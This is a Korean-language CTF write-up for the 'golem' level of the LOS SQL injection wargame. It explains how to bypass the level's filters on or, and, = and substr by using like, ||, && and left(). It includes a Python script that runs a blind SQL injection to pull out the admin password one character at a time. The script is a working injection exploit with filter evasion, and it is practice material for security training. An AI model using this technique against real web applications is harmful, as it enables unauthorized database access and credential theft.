본문 바로가기

Wargame, CTF/LOS_eagle

LOS_golem

두 번째 if문에서

or, and, substr(, =을 필터링 했다

그리고 입력한 pw와 실제

데이터 베이스에 있는 admin의 pw가 일치해야한다

 

Hint

substr 대처함수

or, and 필터링 우회

=필터링 우회

...더보기

=대신 like로 id에 admin을 가져온다

참을 만들기위해 =대신 >로 대처한다

pw의 길이는 8자리

substr 대신

left, rigth 등을 사용할 수 있다

left(pw, 3)->pw 왼쪽에서 부터 3자리

import requests

url="https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw="

cookie={"PHPSESSID":"qagfqnef3onon13vkcpmp4g8r3"}

session=requests.Session()

password=""

for i in range(1,9):
    for j in range(33, 127):
        payload=session.get(url+"' || id like 'admin' %26%26 left(pw,"+str(i)+") like '"+password+chr(j)+"'%23",cookies=cookie)
        if("Hello admin" in payload.text):
            print(chr(j)+"is correct!!!!!!!")
            password += chr(j)
            break
        print(chr(j)+"is incorrect")
print(password)

이것도 역시 대소문자 바꿔서 클리어

'Wargame, CTF > LOS_eagle' 카테고리의 다른 글

LOS _bugbear  (0) 2019.11.07
LOS _darkknight  (0) 2019.10.05
LOS _skeleton  (0) 2019.10.05
LOS _vampire  (0) 2019.10.05
LOS _troll  (0) 2019.10.05